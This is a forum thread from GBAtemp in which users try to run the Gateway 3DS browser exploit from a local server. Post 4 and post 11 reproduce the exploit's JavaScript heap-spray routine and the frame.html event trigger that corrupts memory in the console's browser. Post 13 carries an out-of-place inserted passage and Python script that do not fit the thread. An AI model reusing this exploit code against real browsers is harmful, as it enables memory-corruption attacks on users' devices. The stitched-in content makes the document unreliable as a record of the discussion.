[Attempt] Running GW3.0 Web Exploit on a Local Network

Discussion in '3DS - Flashcards & Custom Firmwares' started by bendrr, Jan 10, 2015.

  1. bendrr (OP), GBAtemp Regular

    I can't browse anything but ssl ( https:// ) right now with my 3ds browsers. I copied the javascript and html at http://go.gateway-3ds.com/index.php and saved it on my local xampp network so I can browse it from my network. No joy so far, just loads the page and does nothing. It's on 6.2 firmware. I formatted it, cleared history and cookies.

    So the question is: since the browser exploit just loads launcher.dat from the SD card (smc://launcher.dat), should it work just the same on my network? The xampp install works fine.



    The files I used for my solution were from Falo:

    There were various instructions from others in this thread, read for details.


  2. Venseer, A weapon to surpass Metal Gear

    It's a PHP page
    Maybe there is hidden PHP code on it? Not sure
  3. PhoenixWrightX, GBAtemp Regular

    It begins.
     
  4. bendrr (OP), GBAtemp Regular

    Just to get it out of the way, this is the HTML on the page in question:
    HTML:
    <html>
    <head>
    <style>
        body {
            color:white;
            background:black;
        }
       
       
    </style>
    <script>
        function magicfun(mem, size, v) {
            var a = new Array(size - 20);
            nv = v + unescape("%ucccc");
            for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
            var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
     
            mem.push(t);
        }
     
        function dsm(evnt) {
            var mem = [];
     
            for (var j = 20; j < 430; j++) {
                magicfun(mem, j, unescape("\u0000\u08e0\u0004\u08e0\u0008\u08e0\u000c\u08e0\u0010\u08e0\u0014\u08e0\u0018\u08e0\u001c\u08e0\u0020\u08e0\u0024\u08e0\u0028\u08e0\u002c\u08e0\u0030\u08e0\u0034\u08e0\u0038\u08e0\u003c\u08e0\u0040\u08e0\u0044\u08e0\u0048\u08e0\u004c\u08e0\u0050\u08e0\u0054\u08e0\u0058\u08e0\u005c\u08e0\u0060\u08e0\u0064\u08e0\u0068\u08e0\u006c\u08e0\u0070\u08e0\u0074\u08e0\u0078\u08e0\u007c\u08e0\u0080\u08e0\u0084\u08e0\u0088\u08e0\u008c\u08e0\u0090\u08e0\u0094\u08e0\u0098\u08e0\u009c\u08e0\u00a0\u08e0\u00a4\u08e0\u00a8\u08e0\u00ac\u08e0\u00b0\u08e0\u00b4\u08e0\u00b8\u08e0\u00bc\u08e0\u00c0\u08e0\u00c4\u08e0\u00c8\u08e0\u00cc\u08e0\u00d0\u08e0\u00d4\u08e0\u00d8\u08e0\u00dc\u08e0\u00e0\u08e0\u00e4\u08e0\u00e8\u08e0\u00ec\u08e0\u00f0\u08e0\u00f4\u08e0\u00f8\u08e0\u00fc\u08e0\u0100\u08e0\u0104\u08e0\u0108\u08e0\u010c\u08e0\u0110\u08e0\u0114\u08e0\u0118\u08e0\u011c\u08e0\u0120\u08e0\u0124\u08e0\u0128\u08e0\u012c\u08e0\u0130\u08e0\u0134\u08e0\u0138\u08e0\u013c\u08e0\u0140\u08e0\u0144\u08e0\u0148\u08e0\u014c\u08e0\u0150\u08e0\u0154\u08e0\u0158\u08e0\u015c\u08e0\u0160\u08e0\u0164\u08e0\u0168\u08e0\u016c\u08e0\u0170\u08e0\u0174\u08e0\u0178\u08e0\u017c\u08e0\u0180\u08e0\u0184\u08e0\u0188\u08e0\u018c\u08e0\u0190\u08e0\u0194\u08e0\u0198\u08e0\u019c\u08e0\u01a0\u08e0\u01a4\u08e0\u01a8\u08e0\u01ac\u08e0\u01b0\u08e0\u01b4\u08e0\u01b8\u08e0\u01bc\u08e0\u01c0\u08e0\u01c4\u08e0\u01c8\u08e0\u01cc\u08e0\u01d0\u08e0\u01d4\u08e0\u01d8\u08e0\u01dc\u08e0\u01e0\u08e0\u01e4\u08e0\u01e8\u08e0\u01ec\u08e0\u01f0\u08e0\u01f4\u08e0\u01f8\u08e0\u01fc\u08e0"));
            }
        }
    </script>
    </head>
    <body>
            <h1 align="center">GATEWAY 3DS LOADING...</h1>
    </body>
    </html>
    
    It should run no matter what server it is on (local or not), right?
     
  5. hias, Newcomer

    No, you downloaded the wrong file; you are missing the hidden iframe and the correct payload.
    Check my post on the main thread.
    Visit the site on your pc using the correct 3ds user agent and try again please :)
  6. bendrr (OP), GBAtemp Regular

    So that's the issue; I will move to a normal internet connection and try again.

    Does anyone have the contents of the iframe?
     
  7. hias, Newcomer

    The iframe just executes the javascript code via an event. Not sure if this is needed and part of the browser bug. The important part is the correct payload.
     
  8. KingBlank, King of Nothing

    It would be great if we could save the exploit to the 3ds somehow and navigate to it in the browser to run it without a server.
     
  9. Thomas12345, GBAtemp Advanced Fan

    I have the index.html and frame.html but I cannot get it to work on my own server.
     
  10. bendrr (OP), GBAtemp Regular

    Can you paste the contents of iframe.html somewhere? I'd love to look at it.
  11. Thomas12345, GBAtemp Advanced Fan

    The frame.html:

    Code:
    <html>
            <head>
                    <script>
                            var nb = 0;
                            function handleBeforeLoad() {
                                    if (++nb == 1) {
                                            p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                                    } else if (nb == 2) {
                                            p.removeChild(f);
                                    }
                            }
     
                            function documentLoaded() {
                                    f = window.frameElement;
                                    p = f.parentNode;
                                    var o = document.createElement("object");
                                    o.addEventListener('beforeload', handleBeforeLoad, false);
                                    document.body.appendChild(o);
                            }
     
                            window.onload = documentLoaded;
                    </script>
            </head>
            <body>
                    KEKEKEKEK...
            </body>
    </html>
    
  12. bendrr (OP), GBAtemp Regular

    Thanks, will try it.
  13. loco365, GBAtemp Guru

    Yeah, if you change your user agent to that of a 3DS browser, you can grab the code yourself and try locally hosting it.
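    Since hias and loco365 both point out that the server only returns the iframe-bearing page to the 3DS browser's user agent, the analyst-side check for that kind of user-agent-conditioned delivery is to fetch the same URL under two user agents and diff the responses for frames that appear in only one of them. The script below is an added example, not code from this thread or from Gateway; it runs offline over two constructed responses (the iframe in the second one is illustrative, not a captured copy of the real page) and flags frames that are sized to nothing or styled invisible.

```python
from html.parser import HTMLParser
import re

# Constructed sample responses (not captured from any real server): what a
# desktop browser would be served versus what a page conditioned on the 3DS
# user agent might add. The iframe element is the only difference.
DESKTOP_RESPONSE = """<html><head><title>go</title></head>
<body><h1 align="center">GATEWAY 3DS LOADING...</h1></body></html>"""

CONSOLE_RESPONSE = """<html><head><title>go</title></head>
<body><h1 align="center">GATEWAY 3DS LOADING...</h1>
<iframe src="frame.html" width="0" height="0" style="display:none"></iframe>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class FrameCollector(HTMLParser):
    """Collects every <iframe>, <frame> and <object> start tag with its attributes."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "frame", "object"):
            self.frames.append((tag, dict(attrs)))


def is_hidden(attrs):
    """True when the element is sized to nothing or styled invisible."""
    zero = {"0", "0px"}
    return (attrs.get("width", "") in zero or attrs.get("height", "") in zero
            or bool(HIDDEN_STYLE.search(attrs.get("style", ""))))


def find_frames(html):
    """Returns (tag, source, hidden) for each frame-like element in the page."""
    parser = FrameCollector()
    parser.feed(html)
    return [(tag, a.get("src", a.get("data", "")), is_hidden(a)) for tag, a in parser.frames]


def ua_conditional_frames(baseline_html, suspect_html):
    """Frames present in the suspect response but absent from the baseline.
    Anything served only to the targeted client is what a copy saved from a
    desktop browser will miss, which is the mismatch described in this thread."""
    baseline = set(find_frames(baseline_html))
    return [f for f in find_frames(suspect_html) if f not in baseline]


if __name__ == "__main__":
    for tag, src, hidden in ua_conditional_frames(DESKTOP_RESPONSE, CONSOLE_RESPONSE):
        print(f"{tag} src={src!r} hidden={hidden}")
```

    To use it against live responses, pass the body fetched with a desktop user agent as the baseline and the body fetched with the console's user agent as the suspect.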
  14. Helper, GBAtemp Regular

    Are y'all entirely certain the web browser entrypoint only loads launcher.dat? If so, why--do you have evidence to suggest so?
    If not, I'd probably try sniffing the network to see if the 3DS downloads any other data when the exploit is executed (in the normal way, from the GW website).

    Also, could you clarify "just loads the page and does nothing"? I assume this means 'I see "GATEWAY 3DS LOADING"; the web browser does not close with an error or otherwise misbehave'; is this correct?

    (I'm a useless asshole who can't help you anyway--sorry ;_;. I'm just interested in the browser exploit.)
     
  15. andzalot55, I'm very delicious. mmmm.


    Have you tried the QR Code version? I saw a post about it.
     
  16. Bug_Checker_, GBAtemp Advanced Fan

  17. bendrr (OP), GBAtemp Regular

    Thanks, missed that.

    Tried running it locally, no dice. Will move the 3ds to a normal network tomorrow and finish the update then.
     
  18. bendrr (OP), GBAtemp Regular

    The browser closes with an error after the page loads, asking me to restart the 3ds, when I load the exploit locally. I do see "GATEWAY 3DS LOADING..." before it closes.
     
  19. Helper, GBAtemp Regular

    Interesting. And that's the error which asks you to save and then restart it yourself--not the one which forces a shutdown as soon as you acknowledge the message?

    If it's the latter, I'd say something has gone very wrong somewhere. But if it's the former, I think you're almost there. I kept getting the error message upon loading the page; I finally got it to work by placing launcher.dat on a different, newly-formatted SD card. Anyway, it sounds like you have your server set up perfectly--kudos for that!
     
  20. bendrr (OP), GBAtemp Regular

    The first error you mentioned is the one. I looked at the javascript functions that I see and it's a buffer overload I think. Wonder why it's not working. The console doesn't throw any errors with default settings. I wonder what firebug would report if anything.

    *edit
    Just an undefined error, no specifics so far. It's my network, I'm positive, but I wonder why it can't be executed off their server. If it matters to anyone with the same error, I also get "Failed to load part of this page" when trying to use it locally.

    If they enabled ssl for the /go/ folder, that would solve some problems for me (and others?).

    Another note, wish they would release the index.php and javascript for a backup url and even better, offline mode. I suppose offline mode is in the next update maybe? The index file has some of the exploit, calculations I think?

    Any ideas?